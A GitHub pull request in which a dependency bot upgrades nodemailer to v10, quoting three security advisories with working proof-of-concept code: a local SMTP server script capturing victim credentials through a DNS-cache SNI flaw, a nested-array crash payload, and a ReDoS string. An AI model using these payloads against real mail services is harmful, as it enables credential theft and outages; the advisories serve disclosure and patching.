Skip to content

fix(deps): update dependency nodemailer to v10 [security] - #4499

Open
renovate-bot wants to merge 1 commit into
GoogleCloudPlatform:mainfrom
renovate-bot:renovate/npm-nodemailer-vulnerability
Open

renovate-bot wants to merge 1 commit into
GoogleCloudPlatform:mainfrom
renovate-bot:renovate/npm-nodemailer-vulnerability

Conversation

@renovate-bot

@renovate-bot renovate-bot commented Oct 3, 2026 •

Copy link
Copy Markdown
Contributor

This PR contains the following updates:

Package Change Age Confidence
nodemailer (source) ^9.0.0 → ^10.0.6 age confidence

Nodemailer: Process-global DNS cache reuses TLS servername across transports, enabling cross-tenant SMTP credential disclosure

GHSA-6vj9-mwq6-2f5v

More information

Details

Summary

Nodemailer's process-global DNS cache is keyed only by host, but each cache entry also stores the caller-specific TLS servername. When two direct SMTPS transports use the same DNS host with different tls.servername values, the first transport's server name is returned to the second transport and overwrites its explicitly configured value.

As a result, Nodemailer sends the wrong SNI value and verifies the peer certificate against the wrong identity. In a multi-tenant service or SNI-routed SMTP gateway, one tenant can prime the cache so that a victim transport connects to the attacker's TLS virtual host, accepts the attacker's certificate with rejectUnauthorized: true, and sends the victim's SMTP credentials to it.

Affected component
  • Ecosystem: npm
  • Package: nodemailer
  • Repository: https://github.com/nodemailer/nodemailer
  • Tested version: 10.0.1
  • Tested commit: 40d52215aac65b811d7e131bc916f68605efd9d2
  • Runtime-confirmed vulnerable versions: 5.0.0 and 10.0.1
  • Affected versions: >= 5.0.0, <= 10.0.1
  • Patched versions: None known at the time of this report
  • Affected mode: Direct TLS/SMTPS connections (secure: true) where different transports use the same non-IP host and different TLS servername values

The vulnerable cache implementation was introduced in commit 6859b5dd96c8d9f0070a3169a877181b71df4a3b on 2018-12-28. Git history shows v5.0.0 as the first release tag containing that commit. The behavior remains present in v10.0.1.

Details
Root cause

src/shared/index.ts defines one module-global DNS cache, keyed only by the DNS host:

export const dnsCache = new Map<string, DnsCacheEntry>();

Although the cache key contains only host, the cached value contains both DNS addresses and the request-specific TLS identity:

const value: DnsCacheValue = {
    addresses: allAddresses,
    servername: options.servername || host
};

dnsCache.set(host, {
    value,
    expires: Date.now() + (options.dnsTtl || DNS_TTL)
});

On a cache hit, resolveHostname() returns the cached servername without considering the current call's options.servername:

if (!cached.expires || cached.expires >= now) {
    return callback(
        null,
        formatDNSValue(cached.value, {
            cached: true
        })
    );
}

formatDNSValue() copies that stale value into the result:

return Object.assign(
    {
        servername: value.servername,
        host,
        _addresses: addresses
    },
    extra || {}
);

For a direct TLS connection, SMTPConnection.connect() initially copies the current transport's TLS configuration into opts. _resolveAndConnect() then overwrites every truthy field with the cached resolver result, including opts.servername:

Object.assign(opts, this.options.tls || {});

if (this.servername && !opts.servername) {
    opts.servername = this.servername;
}

return this._resolveAndConnect(opts, resolved => {
    this._connectToHost(opts, this.secureConnection);
});
for (const key of Object.keys(resolved!)) {
    if (key.charAt(0) !== '_' && (resolved as { [key: string]: any })[key]) {
        (opts as { [key: string]: any })[key] = (resolved as { [key: string]: any })[key];
    }
}

The resulting opts object is passed to tls.connect(). Node therefore sends the cached server name as SNI and verifies the certificate against that cached name, rather than against the server name explicitly configured for the current transport.

The default DNS cache TTL is five minutes:

const DNS_TTL = 5 * 60 * 1000;
Code path
Tenant A: createTransport({ host: H, secure: true,
                            tls: { servername: attackerName } })
  -> SMTPConnection.connect()
  -> _resolveAndConnect(opts)
  -> shared.resolveHostname({ host: H, servername: attackerName })
  -> dnsCache.set(H, { addresses, servername: attackerName })

Victim: createTransport({ host: H, secure: true,
                          tls: { servername: victimName } })
  -> SMTPConnection.connect()
  -> opts.servername = victimName
  -> _resolveAndConnect(opts)
  -> shared.resolveHostname({ host: H, servername: victimName })
  -> dnsCache.get(H)
  -> returns cached servername = attackerName
  -> _resolveAndConnect overwrites opts.servername
  -> tls.connect({ servername: attackerName })
  -> attacker SNI virtual host and certificate are selected
  -> AUTH transmits victim SMTP credentials
Relevant source locations in the tested revision
  • src/shared/index.ts:184 — five-minute default cache TTL
  • src/shared/index.ts:245 — process-global cache keyed by host
  • src/shared/index.ts:247-262 — cached servername returned by formatDNSValue()
  • src/shared/index.ts:292-323 — host-only lookup and cache-hit return
  • src/shared/index.ts:350-359 — caller-specific servername stored in host-only cache
  • src/smtp-connection/index.ts:713-729 — direct TLS options and resolver call
  • src/smtp-connection/index.ts:741-763 — cached fields overwrite current connection options
PoC
Prerequisites
  • Node.js 20 (tested with Node.js 20.20.2)
  • A checkout/build of Nodemailer 10.0.1
  • OpenSSL to generate the local test certificate

No external SMTP server or network access is required.

1. Generate a certificate for only attacker.test

Create openssl.cnf:

[req]
distinguished_name = dn
x509_extensions = ext
prompt = no

[dn]
CN = attacker.test

[ext]
subjectAltName = DNS:attacker.test
basicConstraints = critical,CA:TRUE
keyUsage = critical,digitalSignature,keyEncipherment,keyCertSign
extendedKeyUsage = serverAuth

Generate the certificate and private key:

openssl req -x509 -newkey rsa:2048 -nodes -days 1 \
  -keyout attacker-key.pem -out attacker-cert.pem -config openssl.cnf
2. Save the following as poc-dns-cache-servername-confusion.mjs

Adjust the two import paths if the PoC is not saved beside the repository checkout.

import fs from 'node:fs';
import tls from 'node:tls';
import nodemailer from '../../nodemailer/dist/esm/nodemailer.js';
import * as shared from '../../nodemailer/dist/esm/shared/index.js';

const cert = fs.readFileSync(new URL('./tls-fixture/attacker-cert.pem', import.meta.url));
const key = fs.readFileSync(new URL('./tls-fixture/attacker-key.pem', import.meta.url));
const observedSni = [];
const observedAuth = [];

const server = tls.createServer({ key, cert }, socket => {
    observedSni.push(socket.servername);
    socket.write('220 attacker.test ESMTP\r\n');
    let input = '';
    socket.on('data', chunk => {
        input += chunk.toString();
        let end;
        while ((end = input.indexOf('\r\n')) >= 0) {
            const line = input.slice(0, end);
            input = input.slice(end + 2);
            if (/^EHLO /i.test(line)) {
                socket.write('250-attacker.test\r\n250 AUTH PLAIN\r\n');
            } else if (/^AUTH /i.test(line)) {
                observedAuth.push(line);
                socket.write('235 2.7.0 Authentication successful\r\n');
            } else if (/^QUIT/i.test(line)) {
                socket.end('221 Bye\r\n');
            } else {
                socket.write('250 OK\r\n');
            }
        }
    });
});

await new Promise(resolve => server.listen(0, '127.0.0.1', resolve));

try {
    shared.dnsCache.clear();

    // Tenant A seeds the process-global cache for the shared DNS host.
    const attackerTransport = nodemailer.createTransport({
        host: 'localhost',
        port: server.address().port,
        secure: true,
        auth: { user: 'attacker@example.test', pass: 'attacker-secret' },
        tls: {
            ca: cert,
            servername: 'attacker.test',
            rejectUnauthorized: true
        }
    });
    await attackerTransport.verify();
    attackerTransport.close();

    // The victim explicitly configures a different TLS identity.
    const victimTransport = nodemailer.createTransport({
        host: 'localhost',
        port: server.address().port,
        secure: true,
        auth: { user: 'victim@example.test', pass: 'victim-secret' },
        tls: {
            ca: cert,
            servername: 'victim.test',
            rejectUnauthorized: true
        }
    });
    await victimTransport.verify();
    victimTransport.close();

    const decoded = observedAuth.map(line =>
        line.startsWith('AUTH PLAIN ')
            ? Buffer.from(line.slice('AUTH PLAIN '.length), 'base64').toString()
            : null
    );

    console.log(JSON.stringify({
        attackerConfiguredServername: 'attacker.test',
        victimConfiguredServername: 'victim.test',
        serverObservedSniForBothConnections: observedSni,
        serverReceivedCredentials: decoded
    }, null, 2));
} finally {
    shared.dnsCache.clear();
    await new Promise(resolve => server.close(resolve));
}
3. Build and run

From the Nodemailer checkout:

npm install
npm run build
node ../audit/nodemailer/poc-dns-cache-servername-confusion.mjs
Observed result
{
  "attackerConfiguredServername": "attacker.test",
  "victimConfiguredServername": "victim.test",
  "serverObservedSniForBothConnections": [
    "attacker.test",
    "attacker.test"
  ],
  "serverReceivedCredentials": [
    "\\u0000attacker@example.test\\u0000attacker-secret",
    "\\u0000victim@example.test\\u0000victim-secret"
  ]
}

The victim configured victim.test, but the server observes attacker.test for both handshakes. The local certificate contains only attacker.test, yet the victim connection succeeds with rejectUnauthorized: true and then sends the victim's username and password.

Expected result

The second connection must use victim.test for SNI and certificate hostname verification. With the PoC certificate, it should fail with a hostname mismatch before SMTP authentication occurs. It must never transmit victim credentials after validating the peer as attacker.test.

Impact

The vulnerability affects long-running applications that create multiple Nodemailer transports in one process and let separate tenants or security domains configure transports that share a DNS host. A practical example is an email platform whose SMTP gateway uses SNI to route several customer-specific SMTP endpoints behind one hostname.

An attacker who can create or exercise one transport can prime the global cache with the shared host and the attacker's tls.servername. During the cache lifetime, a victim's direct SMTPS connection to that host can:

  1. send the attacker's server name as SNI;
  2. be routed to the attacker's TLS virtual host;
  3. validate the attacker's certificate against the stale name, even though strict certificate validation is enabled; and
  4. transmit the victim's SMTP username and password to that endpoint.

Possession of SMTP credentials may also let the attacker read or change mail account state where the provider reuses those credentials, or send mail as the victim. The exact secondary impact depends on the SMTP provider.

Where the attacker cannot control an SNI virtual host, stale cross-transport SNI can still cause certificate mismatch failures and cross-tenant availability impact.

Preconditions and limitations
  • Two transports must execute in the same Node.js process within the cache lifetime.
  • They must use the same non-IP host cache key and different tls.servername values.
  • Credential interception requires an endpoint or gateway that routes connections using SNI, or another deployment where the attacker controls the endpoint selected by the stale name.
  • The demonstrated path uses direct SMTPS (secure: true). The STARTTLS upgrade path constructs TLS options separately and is not claimed vulnerable by this report.
Suggested remediation

The DNS cache should store DNS data only. servername is connection-specific TLS policy and should not be persisted in a cache keyed solely by hostname.

One approach is to remove servername from DnsCacheValue and derive the returned value from the current request on every path:

return {
    host: selectedAddress,
    servername: options.servername || options.host || false,
    _addresses: addresses,
    cached: true
};

As defense in depth, _resolveAndConnect() should not overwrite an explicitly configured opts.servername with resolver metadata. Keying the cache by both host and server name would avoid this particular collision, but keeping TLS identity out of a DNS-address cache provides a cleaner separation.

A regression test should create two direct-TLS transports in the same process with the same DNS host and different explicit server names, then assert that each TLS connection observes and verifies its own configured name regardless of cache order.

Severity

  • CVSS Score: 5.9 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


Nodemailer: Nested structured recipient arrays bypass the parser depth limit and cause stack exhaustion DoS

GHSA-8vvx-rff5-p5rq

More information

Details

Submission metadata
Field Value
Ecosystem npm
Package nodemailer
Repository https://github.com/nodemailer/nodemailer
Tested commit 40d52215aac65b811d7e131bc916f68605efd9d2
Current tested version 10.0.1
Confirmed vulnerable versions 2.7.2, 3.0.0, 7.0.11, 9.1.1, 10.0.1
Proposed affected range >= 2.7.2, <= 10.0.1
Patched version 10.0.2
Summary

Nodemailer 10.0.1 does not safely process deeply nested arrays supplied through recipient fields such as to, cc, and bcc.

The public MimeNodeAddressInput type recursively permits arrays, but MimeNode._parseAddresses() flattens only the outermost array. A remaining nested array is passed to addressparser(), whose Tokenizer coerces the input with .toString(). Native Array.prototype.toString() recursively processes every nested array through join() and toString() until the V8 call stack is exhausted.

A valid 10,021-byte JSON recipient value containing one address wrapped in 5,000 arrays causes:

RangeError: Maximum call stack size exceeded

The exception occurs through the normal sendMail() API before the maxRecipients limit is evaluated. If the integrating application does not catch the synchronous exception around the complete sendMail() invocation, the Node.js worker or server process terminates.

No SMTP server, remote host, large attachment, or successful email delivery is required.

This is distinct from GHSA-rcmh-qjqh-p98v / CVE-2025-14874. The previous vulnerability concerned recursive parsing of RFC 5322 group strings. This report uses Nodemailer's structured recipient-array input and never reaches the parser's MAX_NESTED_GROUP_DEPTH protection.

Security impact

An attacker who can control a recipient field passed to Nodemailer can trigger stack exhaustion using a roughly 10 KB JSON value. Potentially affected integrations include:

  • Email-sending HTTP APIs that accept structured recipient values.
  • Notification workers consuming JSON jobs from a queue.
  • Template or automation systems that forward parsed recipient data to sendMail().
  • Multi-tenant applications that allow users to configure message recipients.

When the exception is not caught, a single request or queue item can terminate the process handling mail. A process manager may restart the worker, but repeated malicious inputs can keep workers in a restart loop and make the service unavailable.

Applications that explicitly validate recipient values as flat strings or flat arrays before calling Nodemailer are not exposed through this path. Applications that wrap the complete synchronous sendMail() invocation in exception handling can prevent process termination, although an attacker can still repeatedly force failed jobs.

Attack prerequisites

The vulnerability is reachable when:

  1. An application accepts attacker-controlled or partially attacker-controlled recipient data.
  2. The application preserves the array structure after parsing JSON.
  3. The resulting value is passed to a Nodemailer recipient field such as to, cc, or bcc.
  4. The application does not impose its own nesting-depth limit before calling Nodemailer.

The proof of concept uses jsonTransport only to avoid requiring an SMTP server. The vulnerable address normalization and envelope construction occur before transport-specific delivery, so the root cause is not limited to jsonTransport.

Technical details
1. The public input type accepts recursively nested arrays

At src/mime-node/index.ts:67, recipient input is recursively defined:

export type MimeNodeAddressInput = string | MimeNodeAddress | MimeNodeAddressInput[];

Pinned source:

https://github.com/nodemailer/nodemailer/blob/40d52215aac65b811d7e131bc916f68605efd9d2/src/mime-node/index.ts#L67

This permits values equivalent to:

[[[[['victim@example.test']]]]]
2. _parseAddresses() removes only the outermost array

At src/mime-node/index.ts:1359-1385, _parseAddresses() wraps the input with [].concat(addresses) and iterates the resulting outer array:

_parseAddresses(addresses: MimeNodeAddressInput | undefined): MimeNodeAddress[] {
    const flattened: MimeNodeAddress[] = [];

    ([] as any[]).concat(addresses).forEach(address => {
        if (address && address.address) {
            const normalized = this._normalizeAddress(address.address);
            // ...
            return;
        }

        const parsed = this._normalizeParsedAddresses(addressparser(address));
        for (let i = 0; i < parsed.length; i++) {
            flattened.push(parsed[i]);
        }
    });

    return flattened;
}

Pinned source:

https://github.com/nodemailer/nodemailer/blob/40d52215aac65b811d7e131bc916f68605efd9d2/src/mime-node/index.ts#L1359-L1386

For an input nested 5,000 levels deep, the callback receives an array nested 4,999 levels deep. Because this value does not have a truthy .address property, it is passed directly to addressparser().

3. Tokenizer invokes recursive native array conversion

The Tokenizer constructor performs the following coercion at src/addressparser/index.ts:393:

this.str = (str || '').toString();

Pinned source:

https://github.com/nodemailer/nodemailer/blob/40d52215aac65b811d7e131bc916f68605efd9d2/src/addressparser/index.ts#L393

When str is an array, this invokes Array.prototype.toString(). Array string conversion invokes join(), which converts every nested element to a string. Deeply nested arrays therefore produce native recursion resembling:

Array.toString
  -> Array.join
     -> childArray.toString
        -> Array.join
           -> childArray.toString
              -> ...

At sufficient depth, V8 raises RangeError: Maximum call stack size exceeded.

4. The recipient limit is applied too late

Nodemailer's maxRecipients protection is evaluated only after the message envelope has been constructed:

const recipientCount = mail.message.getEnvelope().to.length;

Pinned source:

https://github.com/nodemailer/nodemailer/blob/40d52215aac65b811d7e131bc916f68605efd9d2/src/mailer/index.ts#L414-L417

The exception occurs inside getEnvelope(), so maxRecipients cannot prevent this condition.

Vulnerable code path
transporter.sendMail(message)
  -> MailComposer(mail.data).compile()
  -> mail.message.getEnvelope()
  -> MimeNode._parseAddresses(message.to)
  -> addressparser(nestedArray)
  -> new Tokenizer(nestedArray)
  -> nestedArray.toString()
  -> Array.join / Array.toString recursion
  -> RangeError: Maximum call stack size exceeded
Proof of concept
Test environment
Operating system: Windows 11
Node.js: 20.20.2
Nodemailer: 10.0.1
Nodemailer commit: 40d52215aac65b811d7e131bc916f68605efd9d2
Transport: jsonTransport
Installation
mkdir nodemailer-nested-array-poc
cd nodemailer-nested-array-poc
npm init -y
npm install nodemailer@10.0.1

Create poc.mjs:

import nodemailer from 'nodemailer';

const depth = Number(process.argv[2] || 5000);

// Valid JSON containing one address wrapped in `depth` arrays.
const json =
    '['.repeat(depth) +
    '"victim@example.test"' +
    ']'.repeat(depth);

const recipient = JSON.parse(json);

console.log({
    nodemailerVersion: '10.0.1',
    depth,
    jsonBytes: Buffer.byteLength(json)
});

const transport = nodemailer.createTransport({
    jsonTransport: true
});

await transport.sendMail({
    from: 'sender@example.test',
    to: recipient,
    subject: 'Nested recipient array PoC',
    text: 'test'
});

console.log('sendMail resolved');
Trigger
node poc.mjs 5000
Observed result
{
  nodemailerVersion: '10.0.1',
  depth: 5000,
  jsonBytes: 10021
}

node:internal/modules/run_main:123
    triggerUncaughtException(
    ^

RangeError: Maximum call stack size exceeded
    at Array.join (<anonymous>)
    at Array.toString (<anonymous>)
    at Array.join (<anonymous>)
    at Array.toString (<anonymous>)
    at Array.join (<anonymous>)
    at Array.toString (<anonymous>)
    ...

Node.js v20.20.2

The tested process exits with status code 1.

Control case

Running the same code with a nesting depth of 500 succeeds:

node poc.mjs 500

Observed result:

{
  nodemailerVersion: '10.0.1',
  depth: 500,
  jsonBytes: 1021
}

sendMail resolved

The difference between the trigger and control cases is only the nesting depth.

Reproduction notes
  • The exact failure depth is platform and runtime dependent because JavaScript stack limits vary.
  • A depth of 5,000 reliably reproduced the exception in the tested Node.js environment.
  • The payload is generated as JSON and parsed with native JSON.parse() to model data received by an HTTP API or queue worker.
  • No network connection is performed because jsonTransport is used.
Version verification

The proof of concept was executed against several released versions. Each listed version exited with RangeError: Maximum call stack size exceeded at a depth of 5,000:

Nodemailer version Result
2.7.2 Vulnerable
3.0.0 Vulnerable
7.0.11 Vulnerable
9.1.1 Vulnerable
10.0.1 Vulnerable

Version 7.0.11 is significant because it contains the fix for the previous string-group recursion advisory. Its failure confirms that this report describes a separate surviving path.

The proposed affected range is >= 2.7.2, <= 10.0.1, representing the versions directly confirmed during testing and the continuous vulnerable implementation observed in source history. Earlier releases were not assessed and should not be considered confirmed safe.

Difference from GHSA-rcmh-qjqh-p98v / CVE-2025-14874

The previous advisory used a crafted address string containing nested RFC 5322 groups:

g0: g1: g2: ... victim@example.com;

Its recursive path was:

addressparser(string)
  -> _handleAddress()
  -> addressparser(nested group string)

That issue was mitigated by adding and propagating a parser recursion-depth counter capped by MAX_NESTED_GROUP_DEPTH.

This report instead supplies a structured JSON array through the public recipient input:

MimeNode._parseAddresses(array)
  -> addressparser(array)
  -> Tokenizer
  -> Array.prototype.toString()

The array conversion happens before any RFC 5322 group parsing. Consequently:

  • No sequence of nested group delimiters is required.
  • _handleAddress() is not the source of recursion.
  • The _depth parser option is not incremented.
  • MAX_NESTED_GROUP_DEPTH is never consulted.
  • Releases containing the previous fix remain vulnerable.

Previous advisory:

GHSA-rcmh-qjqh-p98v

Suggested remediation

Flatten MimeNodeAddressInput values iteratively before passing scalar values to addressparser(). Nested arrays should never be implicitly converted to strings.

For example, the implementation can maintain an explicit work stack:

const pending: unknown[] = [addresses];
const seenArrays = new WeakSet<object>();

while (pending.length) {
    const value = pending.pop();

    if (Array.isArray(value)) {
        if (seenArrays.has(value)) {
            throw new TypeError('Cyclic recipient array');
        }
        seenArrays.add(value);

        for (let i = value.length - 1; i >= 0; i--) {
            pending.push(value[i]);
        }
        continue;
    }

    // Process only scalar strings and structured address objects here.
}

Additional hardening options include:

  1. Reject array nesting above an explicit maximum before any coercion.
  2. Reject unsupported recipient value types instead of passing them to addressparser().
  3. Catch address-normalization exceptions and report them through the normal sendMail() callback or rejected Promise.
  4. Apply input-complexity checks before constructing the envelope and before evaluating maxRecipients.

An iterative implementation is preferable because the public TypeScript type is recursive and indicates that nested array structures are accepted inputs. Cycle detection remains necessary for direct JavaScript callers because cyclic arrays cannot originate from JSON but can be constructed in memory.

Suggested regression tests

The fix should cover:

  1. Deeply nested arrays containing one valid address, completing iteratively or failing with a controlled Nodemailer error.
  2. Nested inputs through to, cc, bcc, replyTo, and explicit envelope fields.
  3. A cyclic JavaScript recipient array.
  4. Ordinary flat strings and arrays, preserving existing behavior.
  5. Arrays containing structured { name, address } objects.
  6. Confirmation that failures reach the callback or rejected Promise instead of escaping the documented error path.

Severity

  • CVSS Score: 5.9 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


Nodemailer: Quadratic backtracking in the addressparser free-text fallback allows remote denial of service

GHSA-v53p-9fqp-m79j

More information

Details

Summary

When addressparser finds no address by its strict reading, it falls back to pulling one out of the free text with /\s*\b[^@\s]+@[^\s]+\b\s*/. That pattern backtracks quadratically: [^@\s]+ is retried from every offset and rescans the run to the next @ each time. A single header value holding a long whitespace-free run with no usable @ blocks the Node.js event loop for tens of seconds.

It is cheaper to exploit than GHSA-prgh-xp8r-p3m5: 273KB is enough for ~43s, where the comment-joined shape needed ~1.5MB for ~10s.

Details

The fallback in src/addressparser/index.ts ran the pattern as a search. [^@\s]+ crosses neither whitespace nor @, so from each start offset it scans forward to the next @ or to the end of the run and then fails, and the engine simply advances one character and repeats. Three shapes make every offset fail:

  • the run holds no @ at all
  • the only @ has nothing after it
  • the only @ has nothing before it

A fourth reaches it with a valid address present but placed past a long run, so the long run is walked before the match is found.

PoC
const addressparser = require('nodemailer/lib/addressparser');
const s = Date.now();
addressparser(' >' + '>[x][x]'.repeat(40000)); // 273KB
console.log(Date.now() - s, 'ms'); // ~43000 ms, blocking

Measured on 10.0.5:

Value Parse time
'[x]'.repeat(40000) (117KB) 9.0 s
'[x]'.repeat(40000) + '@' (117KB) 8.9 s
'@' + '[x]'.repeat(40000) (117KB) 8.8 s
' >' + '>[x][x]'.repeat(40000) (273KB) 42.9 s
Impact

Algorithmic-complexity denial of service. Node is single threaded, so the block stalls the whole process. Reachable without authentication anywhere inbound header values are handed to this parser, mailparser being the notable case, and reachable from application input wherever a user-supplied string is used as a message address, since mime-node parses to, from and cc when composing.

Patch

The search is replaced by a single linear pass that finds the one offset the pattern can match at, which is then applied there with a sticky regex. Match results are unchanged, verified against the previous implementation over 3.4 million random strings comparing both the match offset and the matched text, plus 800k full-parse comparisons.

Found while validating the report in GHSA-prgh-xp8r-p3m5, not reported externally.

Severity

  • CVSS Score: 7.5 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


Release Notes

nodemailer/nodemailer (nodemailer)

v10.0.6

Compare Source

Bug Fixes
  • addressparser: scan free text for an address in linear time (437d7fc)

v10.0.5

Compare Source

Bug Fixes
  • addressparser: parse comment-joined addresses in linear time (c07f175)

v10.0.4

Compare Source

Bug Fixes
  • fetch: scope a cookie without a Path to the RFC 6265 default path (2f907cb)
  • fetch: send cookies set with Path back to the exact path (#​1861) (d557113)
  • mail-composer: keep httpHeaders and tls for href alternatives and icalEvent (#​1862) (7f502be)
  • resolve well-known services by their primary domains (#​1859) (085f525)
  • ses-transport: throw a configuration error when the SES client is missing (#​1863) (4d9c4c9)

v10.0.3

Compare Source

Bug Fixes
  • fetch: honor the cookie Domain attribute without accepting public suffixes (1608391), closes #​1856

v10.0.2

Compare Source

Bug Fixes
  • mime-node: flatten nested recipient arrays without recursion (ebe0849)
  • shared: keep the TLS server name out of the DNS cache (a6512db)

v10.0.1

Compare Source

Bug Fixes
  • types: accept an explicit undefined for optional properties (209719d), closes #​1853
  • types: drop the internal members from the published declarations (81e64ea)

v10.0.0

Compare Source

⚠ BREAKING CHANGES
  • Node.js 20 or newer is required. The Node.js 6 syntax compatibility check and the .npmignore file are gone.
Features
Bug Fixes
  • apply the other keys of a configuration object next to its url (29610f9)
  • dkim: canonicalize raw messages the way verifiers do (2c84b11)
  • keep a transporter assignable to the plain Transporter type (8bf55fb)
  • shared: keep a colon in the user name of a connection or proxy url (6acf4b6)
  • shared: refuse URL hosts the legacy parser would truncate (17a5068)
  • shared: resolve hostnames when the runtime has no interface table (8b03240)
  • smtp-connection: clear the timers of a connection dropped before the greeting (01dcaa0)
  • smtp-connection: keep an incomplete server reply out of lastServerResponse (1a6e427)
  • smtp-pool: free the pool slot when the proxy socket can not be opened (204a344)
  • well-known: keep nodemailer/lib/well-known/services.json available (367730c)

v9.1.1

Compare Source

Bug Fixes
  • mailer: apply the message access policy in resolveContent (dc48ed3)
  • mailer: keep message data from reopening the access sandbox (ab7ef34)
  • mime-node: inherit the access policy from the tree a node hangs in (262d550)

v9.1.0

Compare Source

Features
  • mailer: cap recipients per message with maxRecipients (7279ac8)
Bug Fixes
  • addressparser: handle address lists in linear time (9116da9)
  • addressparser: terminate the domain at an RFC 5322 comment (902b63e)
  • mime-node: apply UTS-46 mapping when encoding a domain (259c32d)
  • mime-node: dedupe envelope recipients in linear time (7cc38af)
  • mime-node: flatten parsed addresses without concat.apply (83b8c48)
  • mime-node: keep the recipient dedupe linear across address headers (34da642)
  • mime-node: keep URL delimiters away from the domain mapper (b212ac4)

v9.0.6

Compare Source

Bug Fixes
  • addressparser: recover the addr-spec from an angle-addr holding whitespace (e989a22)
  • harden copies of user supplied keys and URL fetching (2f667f4)

v9.0.5

Compare Source

Bug Fixes
  • ci: retrigger the workflows dropped during the Actions outage (85d16c1)
  • mailer: escape specials in List-* header comments (#​1842) (75913bb)
  • mime-funcs: star the continuation key of a restarted parameter line (36bcf1a)
  • mime-node: keep control chars out of header values and msg-id headers (15cf6d1)
  • mime: encode DEL in header parameters and List-* comments (cf69430)
  • mime: keep control chars out of the remaining header positions (5ed9d26)
  • mime: normalize an address parsed out of a string as well (63685f7)
  • mime: normalize an address so header and envelope agree (a9343b4)
  • mime: stop a header key callback and the dkim tags from injecting (b7d772e)

v9.0.4

Compare Source

Bug Fixes
  • mime-funcs: do not let an unpaired surrogate consume the next character (9797f7f)
  • mime-funcs: keep any surrogate pair intact when chunking base64 mime words (#​1838) (5bd3a65)
  • mime-funcs: percent encode unpaired surrogates in header parameter values (78f4aa2)
  • mime-node: escape backslash and quote in the Content-Type name parameter (#​1837) (adcfc4f)
  • mime: encode HT/CR/LF in header parameter values instead of quoting them (#​1840) (5bc9cab)

v9.0.3

Compare Source

Bug Fixes
  • smtp-connection: harden STARTTLS upgrade and secure socket handling (#​1835) (07d8253)

v9.0.2

Compare Source

Bug Fixes
  • addressparser: keep operator chars inside an address-literal as text (#​1829) (9ba1064)
  • harden smtp-connection low-severity issues (22ddcea)
  • harden smtp-connection response parsing and socket lifecycle (68860b9)
  • prevent SES transport callback double-invocation and hang on sync errors (#​1831) (9517bc5)
  • reject CRLF in HTTP proxy CONNECT destination to prevent request injection (6347b47)

v9.0.1

Compare Source

Bug Fixes
  • enforce disableFileAccess/disableUrlAccess for raw message option (a82e060)

Configuration

📅 Schedule: (UTC)

  • Branch creation
    • At any time (no schedule defined)
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate-bot
renovate-bot requested review from a team as code owners October 3, 2026 23:47
@product-auto-label product-auto-label Bot added samples Issues that are directly related to samples. api: compute Issues related to the Compute Engine API. labels Oct 3, 2026
@dpebot

dpebot commented Oct 3, 2026

Copy link
Copy Markdown
Contributor

/gcbrun

@trusted-contributions-gcf trusted-contributions-gcf Bot added kokoro:force-run Add this label to force Kokoro to re-run the tests. actions:force-run labels Oct 3, 2026

@gemini-code-assist gemini-code-assist Bot left a comment

Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Code Review

This pull request updates the nodemailer dependency to version ^10.0.0 in compute/package.json. The review feedback points out that nodemailer v10.0.0 requires Node.js 20 or newer, which conflicts with the current engines.node requirement of >=16.0.0. It is recommended to update the engines.node field to >=20.0.0 to ensure compatibility.

Comment thread compute/package.json Outdated
"@google-cloud/compute": "^4.0.0",
"@sendgrid/mail": "^8.0.0",
"nodemailer": "^9.0.0",
"nodemailer": "^10.0.0",

Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

high

Nodemailer v10.0.0 and above requires Node.js 20 or newer. However, the engines.node field in this package.json specifies >=16.0.0. Upgrading to nodemailer v10 without updating the engine requirements or ensuring the runtime is at least Node.js 20 will cause compatibility issues on older Node.js versions. Please update the engines.node field to >=20.0.0 to match the new dependency requirements.

References
  1. When a dependency upgrade requires a higher Node.js version than currently specified in 'engines.node', consider upgrading the 'engines.node' requirement to a supported version (e.g., '>= 18' or '>= 20') instead of reverting the dependency version.

@renovate-bot
renovate-bot force-pushed the renovate/npm-nodemailer-vulnerability branch from b8ec461 to 962d291 Compare October 4, 2026 03:00
@dpebot

dpebot commented Oct 4, 2026

Copy link
Copy Markdown
Contributor

/gcbrun

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

actions:force-run api: compute Issues related to the Compute Engine API. kokoro:force-run Add this label to force Kokoro to re-run the tests. major samples Issues that are directly related to samples.

Projects

None yet

Development

Successfully merging this pull request may close these issues.

2 participants